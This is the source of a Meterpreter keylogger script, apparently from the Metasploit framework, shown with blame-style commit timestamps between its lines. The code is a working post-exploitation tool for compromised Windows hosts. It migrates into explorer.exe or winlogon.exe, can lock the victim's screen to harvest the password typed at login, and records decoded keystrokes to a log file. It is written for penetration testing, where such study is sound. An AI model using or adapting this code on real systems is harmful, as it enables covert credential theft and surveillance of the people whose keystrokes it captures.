2010-06-23 00:50:14 +00:00
|
|
|
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
|
2013-03-22 13:30:56 +00:00
|
|
|
# Updates by Shellster
|
2010-06-23 00:50:14 +00:00
|
|
|
#-------------------------------------------------------------------------------
|
2009-03-24 03:21:57 +00:00
|
|
|
session = client
|
2009-10-26 05:26:08 +00:00
|
|
|
# Script Options
|
|
|
|
@@exec_opts = Rex::Parser::Arguments.new(
|
2013-09-30 18:47:53 +00:00
|
|
|
"-h" => [ false, "Help menu." ],
|
|
|
|
"-t" => [ true, "Time interval in seconds between recollection of keystrokes, default 30 seconds." ],
|
|
|
|
"-c" => [ true, "Type of key capture. (0) for user key presses, (1) for winlogon credential capture, or (2) for no migration. Default is 2." ],
|
|
|
|
"-l" => [ false, "Lock screen when capturing Winlogon credentials."],
|
|
|
|
"-k" => [ false, "Kill old Process"]
|
2009-10-26 05:26:08 +00:00
|
|
|
)
|
|
|
|
def usage
|
2013-09-30 18:47:53 +00:00
|
|
|
print_line("Keylogger Recorder Meterpreter Script")
|
|
|
|
print_line("This script will start the Meterpreter Keylogger and save all keys")
|
|
|
|
print_line("in a log file for later anlysis. To stop capture hit Ctrl-C")
|
|
|
|
print_line("Usage:" + @@exec_opts.usage)
|
|
|
|
raise Rex::Script::Completed
|
2009-10-26 05:26:08 +00:00
|
|
|
end
|
|
|
|
|
2009-03-24 03:21:57 +00:00
|
|
|
|
|
|
|
#Get Hostname
|
2012-02-29 01:28:47 +00:00
|
|
|
host,port = session.session_host, session.session_port
|
2009-03-24 03:21:57 +00:00
|
|
|
|
|
|
|
# Create Filename info to be appended to downloaded files
|
|
|
|
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
|
|
|
|
|
|
|
|
# Create a directory for the logs
|
2010-06-23 00:50:14 +00:00
|
|
|
logs = ::File.join(Msf::Config.log_directory, 'scripts', 'keylogrecorder')
|
2009-03-24 03:21:57 +00:00
|
|
|
|
|
|
|
# Create the log directory
|
|
|
|
::FileUtils.mkdir_p(logs)
|
|
|
|
|
|
|
|
#logfile name
|
2010-04-24 15:13:26 +00:00
|
|
|
logfile = logs + ::File::Separator + host + filenameinfo + ".txt"
|
2009-03-24 03:21:57 +00:00
|
|
|
|
|
|
|
#Interval for collecting Keystrokes in seconds
|
|
|
|
keytime = 30
|
|
|
|
|
|
|
|
#Type of capture
|
2013-03-22 17:57:10 +00:00
|
|
|
captype = 2
|
2010-07-08 17:27:01 +00:00
|
|
|
# Function for locking the screen -- Thanks for the idea and API call Mubix
|
|
|
|
def lock_screen
|
2013-09-30 18:47:53 +00:00
|
|
|
print_status("Locking Screen...")
|
|
|
|
lock_info = client.railgun.user32.LockWorkStation()
|
|
|
|
if lock_info["GetLastError"] == 0
|
|
|
|
print_status("Screen has been locked")
|
|
|
|
else
|
|
|
|
print_error("Screen lock Failed")
|
|
|
|
end
|
2010-07-08 17:27:01 +00:00
|
|
|
end
|
2009-03-24 03:21:57 +00:00
|
|
|
#Function to Migrate in to Explorer process to be able to interact with desktop
|
2013-03-22 13:30:56 +00:00
|
|
|
def explrmigrate(session,captype,lock,kill)
|
2013-09-30 18:47:53 +00:00
|
|
|
#begin
|
|
|
|
if captype.to_i == 0
|
|
|
|
process2mig = "explorer.exe"
|
|
|
|
elsif captype.to_i == 1
|
|
|
|
if is_uac_enabled?
|
|
|
|
print_error("UAC is enabled on this host! Winlogon migration will be blocked.")
|
|
|
|
raise Rex::Script::Completed
|
|
|
|
end
|
|
|
|
process2mig = "winlogon.exe"
|
|
|
|
if lock
|
|
|
|
lock_screen
|
|
|
|
end
|
|
|
|
else
|
|
|
|
process2mig = "explorer.exe"
|
|
|
|
end
|
|
|
|
# Actual migration
|
|
|
|
mypid = session.sys.process.getpid
|
|
|
|
session.sys.process.get_processes().each do |x|
|
|
|
|
if (process2mig.index(x['name'].downcase) and x['pid'] != mypid)
|
|
|
|
print_status("\t#{process2mig} Process found, migrating into #{x['pid']}")
|
|
|
|
session.core.migrate(x['pid'].to_i)
|
|
|
|
print_status("Migration Successful!!")
|
|
|
|
|
|
|
|
if (kill)
|
|
|
|
begin
|
|
|
|
print_status("Killing old process")
|
|
|
|
client.sys.process.kill(mypid)
|
|
|
|
print_status("Old process killed.")
|
|
|
|
rescue
|
|
|
|
print_status("Failed to kill old process.")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
return true
|
|
|
|
# rescue
|
|
|
|
# print_status("Failed to migrate process!")
|
|
|
|
# return false
|
|
|
|
# end
|
2009-03-24 03:21:57 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
#Function for starting the keylogger
|
|
|
|
def startkeylogger(session)
|
2013-09-30 18:47:53 +00:00
|
|
|
begin
|
|
|
|
#print_status("Grabbing Desktop Keyboard Input...")
|
|
|
|
#session.ui.grab_desktop
|
|
|
|
print_status("Starting the keystroke sniffer...")
|
|
|
|
session.ui.keyscan_start
|
|
|
|
return true
|
|
|
|
rescue
|
|
|
|
print_status("Failed to start Keylogging!")
|
|
|
|
return false
|
|
|
|
end
|
2009-03-24 03:21:57 +00:00
|
|
|
end
|
|
|
|
|
2010-12-05 14:32:51 +00:00
|
|
|
def write_keylog_data session, logfile
|
2013-09-30 18:47:53 +00:00
|
|
|
data = session.ui.keyscan_dump
|
|
|
|
outp = ""
|
|
|
|
data.unpack("n*").each do |inp|
|
|
|
|
fl = (inp & 0xff00) >> 8
|
|
|
|
vk = (inp & 0xff)
|
|
|
|
kc = VirtualKeyCodes[vk]
|
|
|
|
|
|
|
|
f_shift = fl & (1<<1)
|
|
|
|
f_ctrl = fl & (1<<2)
|
|
|
|
f_alt = fl & (1<<3)
|
|
|
|
|
|
|
|
if(kc)
|
|
|
|
name = ((f_shift != 0 and kc.length > 1) ? kc[1] : kc[0])
|
|
|
|
case name
|
|
|
|
when /^.$/
|
|
|
|
outp << name
|
|
|
|
when /shift|click/i
|
|
|
|
when 'Space'
|
|
|
|
outp << " "
|
|
|
|
else
|
|
|
|
outp << " <#{name}> "
|
|
|
|
end
|
|
|
|
else
|
|
|
|
outp << " <0x%.2x> " % vk
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
sleep(2)
|
|
|
|
|
|
|
|
if(outp.length > 0)
|
|
|
|
file_local_write(logfile,"#{outp}\n")
|
|
|
|
end
|
2010-12-05 14:32:51 +00:00
|
|
|
end
|
|
|
|
|
2010-07-08 17:27:01 +00:00
|
|
|
# Function for Collecting Capture
|
2009-03-24 03:21:57 +00:00
|
|
|
def keycap(session, keytime, logfile)
|
2013-09-30 18:47:53 +00:00
|
|
|
begin
|
|
|
|
rec = 1
|
|
|
|
#Creating DB for captured keystrokes
|
|
|
|
file_local_write(logfile,"")
|
|
|
|
|
|
|
|
print_status("Keystrokes being saved in to #{logfile}")
|
|
|
|
#Inserting keystrokes every number of seconds specified
|
|
|
|
print_status("Recording ")
|
|
|
|
while rec == 1
|
|
|
|
#getting and writing Keystrokes
|
|
|
|
write_keylog_data session, logfile
|
|
|
|
|
|
|
|
sleep(keytime.to_i)
|
|
|
|
end
|
|
|
|
rescue::Exception => e
|
|
|
|
print_status "Saving last few keystrokes"
|
|
|
|
write_keylog_data session, logfile
|
|
|
|
|
|
|
|
print("\n")
|
|
|
|
print_status("#{e.class} #{e}")
|
|
|
|
print_status("Stopping keystroke sniffer...")
|
|
|
|
session.ui.keyscan_stop
|
|
|
|
end
|
2009-03-24 03:21:57 +00:00
|
|
|
end
|
2009-10-26 05:26:08 +00:00
|
|
|
|
2009-03-24 03:21:57 +00:00
|
|
|
# Parsing of Options
|
2010-07-08 17:27:01 +00:00
|
|
|
|
2009-03-24 03:21:57 +00:00
|
|
|
helpcall = 0
|
2010-07-08 17:27:01 +00:00
|
|
|
lock = false
|
2013-03-22 13:30:56 +00:00
|
|
|
kill = false
|
|
|
|
|
2009-03-24 03:21:57 +00:00
|
|
|
@@exec_opts.parse(args) { |opt, idx, val|
|
2013-09-30 18:47:53 +00:00
|
|
|
case opt
|
|
|
|
when "-t"
|
|
|
|
keytime = val
|
|
|
|
when "-c"
|
|
|
|
captype = val
|
|
|
|
when "-h"
|
|
|
|
usage
|
|
|
|
when "-l"
|
|
|
|
lock = true
|
|
|
|
when "-k"
|
|
|
|
kill = true
|
|
|
|
end
|
2009-03-24 03:21:57 +00:00
|
|
|
}
|
2010-09-09 16:09:27 +00:00
|
|
|
if client.platform =~ /win32|win64/
|
2013-09-30 18:47:53 +00:00
|
|
|
if (captype.to_i == 2)
|
|
|
|
if startkeylogger(session)
|
|
|
|
keycap(session, keytime, logfile)
|
|
|
|
end
|
|
|
|
elsif explrmigrate(session,captype,lock, kill)
|
|
|
|
if startkeylogger(session)
|
|
|
|
keycap(session, keytime, logfile)
|
|
|
|
end
|
|
|
|
end
|
2010-09-09 16:09:27 +00:00
|
|
|
else
|
2013-09-30 18:47:53 +00:00
|
|
|
print_error("This version of Meterpreter is not supported with this Script!")
|
|
|
|
raise Rex::Script::Completed
|
2012-02-29 01:28:47 +00:00
|
|
|
end
|